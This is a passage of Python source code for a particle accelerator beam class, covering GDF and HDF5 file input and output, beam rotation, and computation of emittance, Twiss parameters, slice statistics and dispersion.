''' take the rms - if the rms is 0 set it to 1, so we don't get a divide by error '''
np.savetxt(file, array, fmt=('%.12e','%.12e','%.12e','%.12e','%.12e','%.12e'))
def write_gdf_beam_file(self, filename, normaliseZ=False):
q = np.full(len(self.x), -1 * constants.elementary_charge)
m = np.full(len(self.x), constants.electron_mass)
nmacro = np.full(len(self.x), abs(self.beam['total_charge'] / constants.elementary_charge / len(self.x)))
toffset = np.mean(self.z / (self.Bz * constants.speed_of_light))
z = self.z if not normaliseZ else (self.z - np.mean(self.z))
dataarray = np.array([self.x, self.y, z, q, m, nmacro, self.gamma*self.Bx, self.gamma*self.By, self.gamma*self.Bz]).transpose()
namearray = 'x y z q m nmacro GBx GBy GBz'
np.savetxt(filename, dataarray, fmt=('%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e'), header=namearray, comments='')
def read_gdf_beam_file_object(self, file):
if isinstance(file, (str)):
gdfbeam = rgf.read_gdf_file(file)
elif isinstance(file, (rgf.read_gdf_file)):
gdfbeam = file
else:
raise Exception('file is not str or gdf object!')
return gdfbeam
def calculate_gdf_s(self, file):
gdfbeam = self.read_gdf_beam_file_object(file)
datagrab = gdfbeam.get_grab(0)
avgt = [datagrab.avgt]
position = [datagrab.position]
sposition = list(zip(*list(sorted(zip(avgt[0], position[0])))))[1]
ssposition = list(zip(sposition, list(sposition[1:])+[0]))
offset = 0
spos = []
for p1,p2 in ssposition:
spos += [p1 + offset]
if p2 < p1:
offset += p1
return spos
def calculate_gdf_eta(self, file):
gdfbeam = self.read_gdf_beam_file_object(file)
etax = []
etaxp = []
tp = []
for p in gdfbeam.positions:
self.read_gdf_beam_file(gdfbeam=gdfbeam, position=p)
if len(self.x) > 0:
e, ep, t = self.calculate_etax()
etax += [e]
etaxp += [ep]
tp += [t]
etax, etaxp = list(zip(*list(sorted(zip(tp, etax, etaxp)))))[1:]
return etax, etaxp
def read_gdf_beam_file_info(self, file):
self.reset_dicts()
gdfbeamdata = None
gdfbeam = self.read_gdf_beam_file_object(file)
print('grab_groups = ', gdfbeam.grab_groups)
print(( 'Positions = ', gdfbeam.positions))
print(( 'Times = ', gdfbeam.times))
def read_gdf_beam_file(self, file=None, position=None, time=None, block=None, charge=None, longitudinal_reference='t', gdfbeam=None):
self.reset_dicts()
if gdfbeam is None and not file is None:
gdfbeam = self.read_gdf_beam_file_object(file)
elif gdfbeam is None and file is None:
return None
if position is not None:# and (time is not None or block is not None):
# print 'Assuming position over time!'
self.beam['longitudinal_reference'] = 't'
gdfbeamdata = gdfbeam.get_position(position)
if gdfbeamdata is not None:
# print('GDF found position ', position)
time = None
block = None
else:
print('GDF DID NOT find position ', position)
position = None
elif position is None and time is not None and block is not None:
# print 'Assuming time over block!'
self.beam['longitudinal_reference'] = 'p'
gdfbeamdata = gdfbeam.get_time(time)
if gdfbeamdata is not None:
block = None
else:
time = None
elif position is None and time is None and block is not None:
gdfbeamdata = gdfbeam.get_grab(block)
if gdfbeamdata is None:
block = None
elif position is None and time is None and block is None:
gdfbeamdata = gdfbeam.get_grab(0)
self.beam['code'] = "GPT"
self.beam['x'] = gdfbeamdata.x
self.beam['y'] = gdfbeamdata.y
if hasattr(gdfbeamdata,'z') and longitudinal_reference == 'z':
# print( 'z!')
# print(( gdfbeamdata.z))
self.beam['z'] = gdfbeamdata.z
self.beam['t'] = np.full(len(self.z), 0)# self.z / (-1 * self.Bz * constants.speed_of_light)
elif hasattr(gdfbeamdata,'t') and longitudinal_reference == 't':
# print( 't!')
self.beam['t'] = gdfbeamdata.t
self.beam['z'] = (-1 * gdfbeamdata.Bz * constants.speed_of_light) * (gdfbeamdata.t-np.mean(gdfbeamdata.t)) + gdfbeamdata.z
self.beam['gamma'] = gdfbeamdata.G
if hasattr(gdfbeamdata,'q') and hasattr(gdfbeamdata,'nmacro'):
self.beam['charge'] = gdfbeamdata.q * gdfbeamdata.nmacro
self.beam['total_charge'] = np.sum(self.beam['charge'])
else:
if charge is None:
self.beam['total_charge'] = 0
else:
self.beam['total_charge'] = charge
# print(( self.beam['charge']))
vx = gdfbeamdata.Bx * constants.speed_of_light
vy = gdfbeamdata.By * constants.speed_of_light
vz = gdfbeamdata.Bz * constants.speed_of_light
velocity_conversion = 1 / (constants.m_e * self.beam['gamma'])
self.beam['px'] = vx / velocity_conversion
self.beam['py'] = vy / velocity_conversion
self.beam['pz'] = vz / velocity_conversion
return gdfbeam
def rotate_beamXZ(self, theta, preOffset=[0,0,0], postOffset=[0,0,0]):
preOffset=np.array(preOffset)
postOffset=np.array(postOffset)
rotation_matrix = np.array([[np.cos(theta), 0, np.sin(theta)], [0, 1, 0], [-1*np.sin(theta), 0, np.cos(theta)]])
beam = np.array([self.x,self.y,self.z]).transpose()
self.beam['x'],self.beam['y'],self.beam['z'] = (np.dot(beam-preOffset, rotation_matrix)-postOffset).transpose()
beam = np.array([self.px, self.py, self.pz]).transpose()
self.beam['px'], self.beam['py'], self.beam['pz'] = np.dot(beam, rotation_matrix).transpose()
if 'reference_particle' in self.beam:
beam = np.array([self.beam['reference_particle'][0], self.beam['reference_particle'][1], self.beam['reference_particle'][2]])
self.beam['reference_particle'][0], self.beam['reference_particle'][1], self.beam['reference_particle'][2] = (np.dot([beam-preOffset], rotation_matrix)[0]-postOffset)
# print 'rotated ref part = ', np.dot([beam-preOffset], rotation_matrix)[0]
beam = np.array([self.beam['reference_particle'][3], self.beam['reference_particle'][4], self.beam['reference_particle'][5]])
self.beam['reference_particle'][3], self.beam['reference_particle'][4], self.beam['reference_particle'][5] = np.dot([beam], rotation_matrix)[0]
self.beam['rotation'] = theta
self.beam['offset'] = preOffset
def unrotate_beamXZ(self):
offset = self.beam['offset'] if 'offset' in self.beam else np.array([0,0,0])
if 'rotation' in self.beam or abs(self.beam['rotation']) > 0:
self.rotate_beamXZ(-1*self.beam['rotation'], -1*offset)
def write_HDF5_beam_file(self, filename, centered=False, mass=constants.m_e, sourcefilename=None, pos=None, rotation=None, longitudinal_reference='t', zoffset=0):
# print('zoffset = ', zoffset, type(zoffset))
if isinstance(zoffset,(list, np.ndarray)) and len(zoffset) == 3:
xoffset = zoffset[0]
yoffset = zoffset[1]
zoffset = zoffset[2]
else:
xoffset = 0
yoffset = 0
# print('xoffset = ', xoffset)
# print('yoffset = ', yoffset)
# print('zoffset = ', zoffset)
with h5py.File(filename, "w") as f:
inputgrp = f.create_group("Parameters")
if not 'total_charge' in self.beam or self.beam['total_charge'] == 0:
self.beam['total_charge'] = np.sum(self.beam['charge'])
if sourcefilename is not None:
inputgrp['Source'] = sourcefilename
if pos is not None:
inputgrp['Starting_Position'] = pos
else:
inputgrp['Starting_Position'] = [0, 0, 0]
if rotation is not None:
inputgrp['Rotation'] = rotation
else:
inputgrp['Rotation'] = 0
inputgrp['total_charge'] = self.beam['total_charge']
inputgrp['npart'] = len(self.x)
inputgrp['centered'] = centered
inputgrp['code'] = self.beam['code']
inputgrp['particle_mass'] = mass
beamgrp = f.create_group("beam")
if 'reference_particle' in self.beam:
beamgrp['reference_particle'] = self.beam['reference_particle']
if 'status' in self.beam:
beamgrp['status'] = self.beam['status']
beamgrp['longitudinal_reference'] = longitudinal_reference
if len(self.beam['charge']) == len(self.x):
chargevector = self.beam['charge']
else:
chargevector = np.full(len(self.x), self.charge/len(self.x))
array = np.array([self.x + xoffset, self.y + yoffset, self.z + zoffset, self.cpx, self.cpy, self.cpz, self.t, chargevector]).transpose()
beamgrp['columns'] = np.array(['x','y','z', 'cpx', 'cpy', 'cpz', 't', 'q'], dtype='S')
beamgrp['units'] = np.array(['m','m','m','eV','eV','eV','s','e'], dtype='S')
beamgrp.create_dataset("beam", data=array)
def read_HDF5_beam_file(self, filename, local=False):
self.reset_dicts()
with h5py.File(filename, "r") as h5file:
if h5file.get('beam/reference_particle') is not None:
self.beam['reference_particle'] = np.array(h5file.get('beam/reference_particle'))
if h5file.get('beam/longitudinal_reference') is not None:
self.beam['longitudinal_reference'] = np.array(h5file.get('beam/longitudinal_reference'))
else:
self.beam['longitudinal_reference'] = 't'
if h5file.get('beam/status') is not None:
self.beam['status'] = np.array(h5file.get('beam/status'))
x, y, z, cpx, cpy, cpz, t, charge = np.array(h5file.get('beam/beam')).transpose()
cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
self.beam['x'] = x
self.beam['y'] = y
self.beam['z'] = z
# self.beam['cpx'] = cpx
# self.beam['cpy'] = cpy
# self.beam['cpz'] = cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
# self.beam['cp'] = cp
# self.beam['p'] = cp * self.q_over_c
# self.beam['xp'] = np.arctan(self.px/self.pz)
# self.beam['yp'] = np.arctan(self.py/self.pz)
self.beam['clock'] = np.full(len(self.x), 0)
# self.beam['gamma'] = np.sqrt(1+(self.cp/self.E0_eV)**2)
# velocity_conversion = 1 / (constants.m_e * self.gamma)
# self.beam['vx'] = velocity_conversion * self.px
# self.beam['vy'] = velocity_conversion * self.py
# self.beam['vz'] = velocity_conversion * self.pz
# self.beam['Bx'] = self.vx / constants.speed_of_light
# self.beam['By'] = self.vy / constants.speed_of_light
# self.beam['Bz'] = self.vz / constants.speed_of_light
self.beam['t'] = t
self.beam['charge'] = charge
self.beam['total_charge'] = np.sum(self.beam['charge'])
startposition = np.array(h5file.get('/Parameters/Starting_Position'))
startposition = startposition if startposition is not None else [0,0,0]
self.beam['starting_position'] = startposition
theta = np.array(h5file.get('/Parameters/Rotation'))
theta = theta if theta is not None else 0
self.beam['rotation'] = theta
if local == True:
self.rotate_beamXZ(self.beam['rotation'], preOffset=self.beam['starting_position'])
''' ******************** Statistical Parameters ************************* '''
def kde_function(self, x, bandwidth=0.2, **kwargs):
"""Kernel Density Estimation with Scipy"""
# Note that scipy weights its bandwidth by the covariance of the
# input data. To make the results comparable to the other methods,
# we divide the bandwidth by the sample standard deviation here.
# Taken from https://jakevdp.github.io/blog/2013/12/01/kernel-density-estimation/
if not hasattr(self, '_kde_x') or not len(x) == len(self._kde_x) or not np.allclose(x, self._kde_x) or not bandwidth == self._kde_bandwidth:
self._kde_x = x
self._kde_bandwidth = bandwidth
self._kde_function = gaussian_kde(x, bw_method=bandwidth / x.std(ddof=1), **kwargs)
return self._kde_function
def PDF(self, x, x_grid, bandwidth=0.2, **kwargs):
kde = self.kde_function(x, bandwidth, **kwargs)
return kde.evaluate(x_grid)
def PDFI(self, x, x_grid, bandwidth=0.2, **kwargs):
kde = self.kde_function(x, bandwidth, **kwargs)
vals = kde.evaluate(x_grid)
f = lambda bin, val: self.charge / len(self.t) * (val / bin)
return vals#self.charge * vals / (2*abs(x_grid[1] - x_grid[0])) / len(self.t) #[f(x_grid[1] - x_grid[0], v) for v in vals]
def CDF(self, x, x_grid, bandwidth=0.2, **kwargs):
kde = self.kde_function(x, bandwidth, **kwargs)
cdf = np.vectorize(lambda e: kde.integrate_box_1d(x_grid[0], e))
return cdf(x_grid)
def FWHM(self, X, Y, frac=0.5):
frac = 1.0/frac if frac > 1 else frac
d = Y - (max(Y) * frac)
indexes = np.where(d > 0)[0]
return abs(X[indexes][-1] - X[indexes][0]), indexes
def covariance(self, u, up):
u2 = u - np.mean(u)
up2 = up - np.mean(up)
return np.mean(u2*up2) - np.mean(u2)*np.mean(up2)
def emittance(self, x, xp, p=None):
cov_x = self.covariance(x, x)
cov_xp = self.covariance(xp, xp)
cov_x_xp = self.covariance(x, xp)
emittance = np.sqrt(cov_x * cov_xp - cov_x_xp**2) if (cov_x * cov_xp - cov_x_xp**2) > 0 else 0
if p is None:
return emittance
else:
gamma = np.mean(p)/self.E0_eV
return gamma*emittance
@property
def volume(self):
return self.volume6D(self.x, self.y, self.z-np.mean(self.z), self.cpx/self.cpz, self.cpy/self.cpz, ((self.cpz/np.mean(self.cp)) - 1))
@property
def density(self):
return len(self.x) / self.volume
def volume6D(self, x, y, t, xp, yp, cp):
if len(x) < 10:
return 1e6
else:
beam = list(zip(x, y, t, xp, yp, cp))
return ConvexHull(beam, qhull_options='QJ').volume
def mve_emittance(self, x, xp, p=None):
(center, radii, rotation, hullP) = MVE.getMinVolEllipse(list(zip(x,xp)), .01)
emittance = radii[0] * radii[1]
if p is None:
return emittance
else:
gamma = np.mean(p)/self.E0_eV
return gamma*emittance
@property
def normalized_horizontal_emittance(self):
return self.emittance(self.x, self.xp, self.cp)
@property
def normalized_vertical_emittance(self):
return self.emittance(self.y, self.yp, self.cp)
@property
def horizontal_emittance(self):
return self.emittance(self.x, self.xp)
@property
def vertical_emittance(self):
return self.emittance(self.y, self.yp)
@property
def normalized_mve_horizontal_emittance(self):
return self.mve_emittance(self.x, self.xp, self.cp)
@property
def normalized_mve_vertical_emittance(self):
return self.mve_emittance(self.y, self.yp, self.cp)
@property
def horizontal_mve_emittance(self):
return self.mve_emittance(self.x, self.xp)
@property
def vertical_mve_emittance(self):
return self.mve_emittance(self.y, self.yp)
@property
def horizontal_emittance_90(self):
emit = self.horizontal_emittance
alpha = self.alpha_x
beta = self.beta_x
gamma = self.gamma_x
emiti = gamma * self.x**2 + 2 * alpha * self.x * self.xp + beta * self.xp * self.xp
return sorted(emiti)[int(0.9*len(emiti)-0.5)]
@property
def normalized_horizontal_emittance_90(self):
emit = self.horizontal_emittance_90
return np.mean(self.cp)/self.E0_eV * emit
@property
def vertical_emittance_90(self):
emit = self.vertical_emittance
alpha = self.alpha_y
beta = self.beta_y
gamma = self.gamma_y
emiti = gamma * self.y**2 + 2 * alpha * self.y * self.yp + beta * self.yp * self.yp
return sorted(emiti)[int(0.9*len(emiti)-0.5)]
@property
def normalized_vertical_emittance_90(self):
emit = self.vertical_emittance_90
return np.mean(self.cp)/self.E0_eV * emit
@property
def beta_x(self):
self.twiss['beta_x'] = self.covariance(self.x,self.x) / self.horizontal_emittance
return self.twiss['beta_x']
@property
def alpha_x(self):
self.twiss['alpha_x'] = -1*self.covariance(self.x,self.xp) / self.horizontal_emittance
return self.twiss['alpha_x']
@property
def gamma_x(self):
self.twiss['gamma_x'] = self.covariance(self.xp,self.xp) / self.horizontal_emittance
return self.twiss['gamma_x']
@property
def beta_y(self):
self.twiss['beta_y'] = self.covariance(self.y,self.y) / self.vertical_emittance
return self.twiss['beta_y']
@property
def alpha_y(self):
self.twiss['alpha_y'] = -1*self.covariance(self.y,self.yp) / self.vertical_emittance
return self.twiss['alpha_y']
@property
def gamma_y(self):
self.twiss['gamma_y'] = self.covariance(self.yp,self.yp) / self.vertical_emittance
return self.twiss['gamma_y']
@property
def twiss_analysis(self):
return self.horizontal_emittance, self.alpha_x, self.beta_x, self.gamma_x, self.vertical_emittance, self.alpha_y, self.beta_y, self.gamma_y
def eta_correlation(self, u):
return self.covariance(u,self.p) / self.covariance(self.p, self.p)
def eta_corrected(self, u):
return u - self.eta_correlation(u)*self.p
@property
def horizontal_emittance_corrected(self):
xc = self.eta_corrected(self.x)
xpc = self.eta_corrected(self.xp)
return self.emittance(xc, xpc)
@property
def vertical_emittance_corrected(self):
yc = self.eta_corrected(self.y)
ypc = self.eta_corrected(self.yp)
return self.emittance(yc, ypc)
@property
def beta_x_corrected(self):
xc = self.eta_corrected(self.x)
self.twiss['beta_x'] = self.covariance(xc, xc) / self.horizontal_emittance_corrected
return self.twiss['beta_x']
@property
def alpha_x_corrected(self):
xc = self.eta_corrected(self.x)
xpc = self.eta_corrected(self.xp)
self.twiss['alpha_x'] = -1*self.covariance(xc, xpc) / self.horizontal_emittance_corrected
return self.twiss['alpha_x']
@property
def gamma_x_corrected(self):
xpc = self.eta_corrected(self.xp)
self.twiss['gamma_x'] = self.covariance(xpc, xpc) / self.horizontal_emittance_corrected
return self.twiss['gamma_x']
@property
def beta_y_corrected(self):
yc = self.eta_corrected(self.y)
self.twiss['beta_y'] = self.covariance(yc,yc) / self.vertical_emittance_corrected
return self.twiss['beta_y']
@property
def alpha_y_corrected(self):
yc = self.eta_corrected(self.y)
ypc = self.eta_corrected(self.yp)
self.twiss['alpha_y'] = -1*self.covariance(yc, ypc) / self.vertical_emittance_corrected
return self.twiss['alpha_y']
@property
def gamma_y_corrected(self):
ypc = self.eta_corrected(self.yp)
self.twiss['gamma_y'] = self.covariance(ypc,ypc) / self.vertical_emittance_corrected
return self.twiss['gamma_y']
@property
def twiss_analysis_corrected(self):
return self.horizontal_emittance_corrected, self.alpha_x_corrected, self.beta_x_corrected, self.gamma_x_corrected, \
self.vertical_emittance_corrected, self.alpha_y_corrected, self.beta_y_corrected, self.gamma_y_corrected
@property
def slice_length(self):
return self._slicelength
@slice_length.setter
def slice_length(self, slicelength):
self._slicelength = slicelength
@property
def slices(self):
return self._slices
@slices.setter
def slices(self, slices):
twidth = (max(self.t) - min(self.t))
if twidth == 0:
t = self.z / (-1 * self.Bz * constants.speed_of_light)
twidth = (max(t) - min(t))
if slices == 0:
slices = int(twidth / 0.1e-12)
self._slices = slices
self._slicelength = twidth / self._slices
def bin_time(self):
if not hasattr(self,'slice'):
self.slice = {}
if not hasattr(self,'_slicelength'):
self.slice_length = 0
# print("Assuming slice length is 100 fs")
twidth = (max(self.t) - min(self.t))
if twidth == 0:
t = self.z / (-1 * self.Bz * constants.speed_of_light)
twidth = (max(t) - min(t))
else:
t = self.t
if not self.slice_length > 0.0:
self.slice_length = twidth / 20.0
nbins = max([1,int(np.ceil(twidth / self.slice_length))])+2
self._hist, binst = np.histogram(t, bins=nbins, range=(min(t)-self.slice_length, max(t)+self.slice_length))
self.slice['t_Bins'] = binst
self._t_binned = np.digitize(t, self.slice['t_Bins'])
self._tfbins = [[self._t_binned == i] for i in range(1, len(binst))]
self._tbins = [np.array(self.t)[tuple(tbin)] for tbin in self._tfbins]
self._cpbins = [np.array(self.cp)[tuple(tbin)] for tbin in self._tfbins]
def bin_momentum(self, width=10**6):
if not hasattr(self,'slice'):
self.slice = {}
pwidth = (max(self.cp) - min(self.cp))
if width is None:
self.slice_length_cp = pwidth / self.slices
else:
self.slice_length_cp = width
nbins = max([1,int(np.ceil(pwidth / self.slice_length_cp))])+2
self._hist, binst = np.histogram(self.cp, bins=nbins, range=(min(self.cp)-self.slice_length_cp, max(self.cp)+self.slice_length_cp))
self.slice['cp_Bins'] = binst
self._cp_binned = np.digitize(self.cp, self.slice['cp_Bins'])
self._tfbins = [np.array([self._cp_binned == i]) for i in range(1, len(binst))]
self._cpbins = [self.cp[tuple(cpbin)] for cpbin in self._tfbins]
self._tbins = [self.t[tuple(cpbin)] for cpbin in self._tfbins]
@property
def slice_bins(self):
if not hasattr(self,'slice'):
self.bin_time()
bins = self.slice['t_Bins']
return (bins[:-1] + bins[1:]) / 2
# return [t.mean() for t in ]
@property
def slice_cpbins(self):
if not hasattr(self,'slice'):
self.bin_momentum()
bins = self.slice['cp_Bins']
return (bins[:-1] + bins[1:]) / 2
# return [t.mean() for t in ]
@property
def slice_momentum(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
self.slice['Momentum'] = np.array([cpbin.mean() if len(cpbin) > 0 else 0 for cpbin in self._cpbins ])
return self.slice['Momentum']
@property
def slice_momentum_spread(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
self.slice['Momentum_Spread'] = np.array([cpbin.std() if len(cpbin) > 0 else 0 for cpbin in self._cpbins])
return self.slice['Momentum_Spread']
@property
def slice_relative_momentum_spread(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
self.slice['Relative_Momentum_Spread'] = np.array([100*cpbin.std()/cpbin.mean() if len(cpbin) > 0 else 0 for cpbin in self._cpbins])
return self.slice['Relative_Momentum_Spread']
def slice_data(self, data):
return [data[tuple(tbin)] for tbin in self._tfbins]
def emitbins(self, x, y):
xbins = self.slice_data(x)
ybins = self.slice_data(y)
return list(zip(*[xbins, ybins, self._cpbins]))
@property
def slice_6D_Volume(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
xbins = self.slice_data(self.x)
ybins = self.slice_data(self.y)
zbins = self.slice_data(self.z-np.mean(self.z))
pxbins = self.slice_data(self.cpx/self.cpz)
pybins = self.slice_data(self.cpy/self.cpz)
pzbins = self.slice_data(((self.cpz/np.mean(self.cp)) - 1))
emitbins = list(zip(xbins, ybins, zbins, pxbins, pybins, pzbins))
self.slice['6D_Volume'] = np.array([self.volume6D(*a) for a in emitbins])
return self.slice['6D_Volume']
@property
def slice_density(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
xbins = self.slice_data(self.x)
volume = self.slice_6D_Volume
self.slice['Density'] = np.array([len(x)/v for x, v in zip(xbins, volume)])
return self.slice['Density']
@property
def slice_horizontal_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.x, self.xp)
self.slice['Horizontal_Emittance'] = np.array([self.emittance(xbin, xpbin) if len(cpbin) > 0 else 0 for xbin, xpbin, cpbin in emitbins])
return self.slice['Horizontal_Emittance']
@property
def slice_vertical_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.y, self.yp)
self.slice['Vertical_Emittance'] = np.array([self.emittance(ybin, ypbin) if len(cpbin) > 0 else 0 for ybin, ypbin, cpbin in emitbins])
return self.slice['Vertical_Emittance']
@property
def slice_normalized_horizontal_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.x, self.xp)
self.slice['Normalized_Horizontal_Emittance'] = np.array([self.emittance(xbin, xpbin, cpbin) if len(cpbin) > 0 else 0 for xbin, xpbin, cpbin in emitbins])
return self.slice['Normalized_Horizontal_Emittance']
@property
def slice_normalized_vertical_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.y, self.yp)
self.slice['Normalized_Vertical_Emittance'] = np.array([self.emittance(ybin, ypbin, cpbin) if len(cpbin) > 0 else 0 for ybin, ypbin, cpbin in emitbins])
return self.slice['Normalized_Vertical_Emittance']
@property
def slice_normalized_mve_horizontal_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.x, self.xp)
self.slice['Normalized_mve_Horizontal_Emittance'] = np.array([self.mve_emittance(xbin, xpbin, cpbin) if len(cpbin) > 0 else 0 for xbin, xpbin, cpbin in emitbins])
return self.slice['Normalized_mve_Horizontal_Emittance']
@property
def slice_normalized_mve_vertical_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.y, self.yp)
self.slice['Normalized_mve_Vertical_Emittance'] = np.array([self.mve_emittance(ybin, ypbin, cpbin) if len(cpbin) > 0 else 0 for ybin, ypbin, cpbin in emitbins])
return self.slice['Normalized_mve_Vertical_Emittance']
@property
def slice_peak_current(self):
if not hasattr(self,'_hist'):
self.bin_time()
f = lambda bin: self.charge / len(self.t) * (len(bin) / (max(bin) - min(bin))) if len(bin) > 1 else 0
# f = lambda bin: len(bin) if len(bin) > 1 else 0
self.slice['Peak_Current'] = np.array([f(bin) for bin in self._tbins])
return abs(self.slice['Peak_Current'])
@property
def slice_max_peak_current_slice(self):
peakI = self.slice_peak_current
self.slice['Max_Peak_Current_Slice'] = list(abs(peakI)).index(max(abs(peakI)))
return self.slice['Max_Peak_Current_Slice']
@property
def slice_beta_x(self):
xbins = self.slice_data(self.beam['x'])
exbins = self.slice_horizontal_emittance
emitbins = list(zip(xbins, exbins))
self.slice['slice_beta_x'] = np.array([self.covariance(x, x)/ex if ex > 0 else 0 for x, ex in emitbins])
return self.slice['slice_beta_x']
@property
def slice_alpha_x(self):
xbins = self.slice_data(self.x)
xpbins = self.slice_data(self.xp)
exbins = self.slice_horizontal_emittance
emitbins = list(zip(xbins, xpbins, exbins))
self.slice['slice_alpha_x'] = np.array([-1*self.covariance(x, xp)/ex if ex > 0 else 0 for x, xp, ex in emitbins])
return self.slice['slice_alpha_x']
@property
def slice_gamma_x(self):
self.twiss['gamma_x'] = self.covariance(self.xp,self.xp) / self.horizontal_emittance
return self.twiss['gamma_x']
@property
def slice_beta_y(self):
ybins = self.slice_data(self.beam['y'])
eybins = self.slice_vertical_emittance
emitbins = list(zip(ybins, eybins))
self.slice['slice_beta_y'] = np.array([self.covariance(y, y)/ey if ey > 0 else 0 for y, ey in emitbins])
return self.slice['slice_beta_y']
@property
def slice_alpha_y(self):
ybins = self.slice_data(self.y)
ypbins = self.slice_data(self.yp)
eybins = self.slice_vertical_emittance
emitbins = list(zip(ybins, ypbins, eybins))
self.slice['slice_alpha_y'] = np.array([-1*self.covariance(y,yp)/ey if ey > 0 else 0 for y, yp, ey in emitbins])
return self.twiss['slice_alpha_y']
@property
def slice_gamma_y(self):
self.twiss['gamma_y'] = self.covariance(self.yp,self.yp) / self.vertical_emittance
return self.twiss['gamma_y']
def sliceAnalysis(self, density=False):
self.slice = {}
self.bin_time()
peakIPosition = self.slice_max_peak_current_slice
slice_density = self.slice_density[peakIPosition] if density else 0
return self.slice_peak_current[peakIPosition], \
np.std(self.slice_peak_current), \
self.slice_relative_momentum_spread[peakIPosition], \
self.slice_normalized_horizontal_emittance[peakIPosition], \
self.slice_normalized_vertical_emittance[peakIPosition], \
self.slice_momentum[peakIPosition], \
self.slice_density[peakIPosition],
def mvesliceAnalysis(self):
self.slice = {}
self.bin_time()
peakIPosition = self.slice_max_peak_current_slice
return self.slice_peak_current[peakIPosition], \
np.std(self.slice_peak_current), \
self.slice_relative_momentum_spread[peakIPosition], \
self.slice_normalized_mve_horizontal_emittance[peakIPosition], \
self.slice_normalized_mve_vertical_emittance[peakIPosition], \
self.slice_momentum[peakIPosition], \
self.slice_density[peakIPosition],
@property
def chirp(self):
self.bin_time()
slice_current_centroid_indices = []
slice_momentum_centroid = []
peakIPosition = self.slice_max_peak_current_slice
peakI = self.slice_peak_current[peakIPosition]
slicemomentum = self.slice_momentum
for index, slice_current in enumerate(self.slice_peak_current):
if abs(peakI - slice_current) < (peakI * 0.75):
slice_current_centroid_indices.append(index)
for index in slice_current_centroid_indices:
slice_momentum_centroid.append(slicemomentum[index])
chirp = (1e-18 * (slice_momentum_centroid[-1] - slice_momentum_centroid[0]) / (len(slice_momentum_centroid) * self.slice_length))
return chirp
@property
def x(self):
return self.beam['x']
@property
def y(self):
return self.beam['y']
@property
def z(self):
return self.beam['z']
@property
def zn(self):
return self.beam['z']-np.mean(self.beam['z'])
@property
def px(self):
return self.beam['px']
@property
def py(self):
return self.beam['py']
@property
def pz(self):
return self.beam['pz']
@property
def cpx(self):
return self.beam['px'] / self.q_over_c
@property
def cpy(self):
return self.beam['py'] / self.q_over_c
@property
def cpz(self):
return self.beam['pz'] / self.q_over_c
@property
def xp(self):
return np.arctan(self.px/self.pz)
@property
def yp(self):
return np.arctan(self.py/self.pz)
@property
def t(self):
return self.beam['t']
@property
def p(self):
return self.cp * self.q_over_c
@property
def cp(self):
return np.sqrt(self.cpx**2 + self.cpy**2 + self.cpz**2)
@property
def Brho(self):
return np.mean(self.p) / constants.elementary_charge
@property
def gamma(self):
return np.sqrt(1+(self.cp/self.E0_eV)**2)
@property
def BetaGamma(self):
return self.cp/self.E0_eV
@property
def vx(self):
velocity_conversion = 1 / (constants.m_e * self.gamma)
return velocity_conversion * self.px
@property
def vy(self):
velocity_conversion = 1 / (constants.m_e * self.gamma)
return velocity_conversion * self.py
@property
def vz(self):
velocity_conversion = 1 / (constants.m_e * self.gamma)
return velocity_conversion * self.pz
@property
def Bx(self):
return self.vx / constants.speed_of_light
@property
def By(self):
return self.vy / constants.speed_of_light
@property
def Bz(self):
return self.vz / constants.speed_of_light
@property
def charge(self):
return self.beam['total_charge']
@property
def sigma_z(self):
return self.rms(self.Bz*constants.speed_of_light*(self.beam['t'] - np.mean(self.beam['t'])))
@property
def momentum_spread(self):
return self.cp.std()/np.mean(self.cp)
@property
def linear_chirp_z(self):
return -1*self.rms(self.Bz*constants.speed_of_light*self.t)/self.momentum_spread/100
def computeCorrelations(self, x, y):
xAve = np.mean(x)
yAve = np.mean(y)
C11 = 0
C12 = 0
C22 = 0
for i, ii in enumerate(x):
dx = x[i] - xAve
dy = y[i] - yAve
C11 += dx*dx
C12 += dx*dy
C22 += dy*dy
C11 /= len(x)
C12 /= len(x)
C22 /= len(x)
return C11, C12, C22
@property
def eta_x(self):
return self.calculate_etax()[0]
@property
def eta_xp(self):
return self.calculate_etax()[1]
def calculate_etax(self):
p = self.cp
pAve = np.mean(p)
p = [a / pAve - 1 for a in p]
S11, S16, S66 = self.computeCorrelations(self.x, self.cp)
eta1 = -pAve * S16/S66 if S66 else 0
S22, S26, S66 = self.computeCorrelations(self.xp, self.cp)
etap1 = -pAve * S26/S66 if S66 else 0
return eta1, etap1, np.mean(self.t)
def performTransformation(self, x, xp, beta=False, alpha=False, nEmit=False):
p = self.cp
pAve = np.mean(p)
p = [a / pAve - 1 for a in p]
S11, S16, S66 = self.computeCorrelations(self.x, self.cp)
eta1 = S16/S66 if S66 else 0
S22, S26, S66 = self.computeCorrelations(self.xp, self.cp)
etap1 = S26/S66 if S66 else 0
for i, ii in enumerate(x):
x[i] -= p[i] * eta1
xp[i] -= p[i] * etap1
S11, S12, S22 = self.computeCorrelations(x, xp)
emit = np.sqrt(S11*S22 - S12**2)
beta1 = S11/emit
alpha1 = -S12/emit
beta2 = beta if beta is not False else beta1
alpha2 = alpha if alpha is not False else alpha1
R11 = beta2/np.sqrt(beta1*beta2)
R12 = 0
R21 = (alpha1-alpha2)/np.sqrt(beta1*beta2)
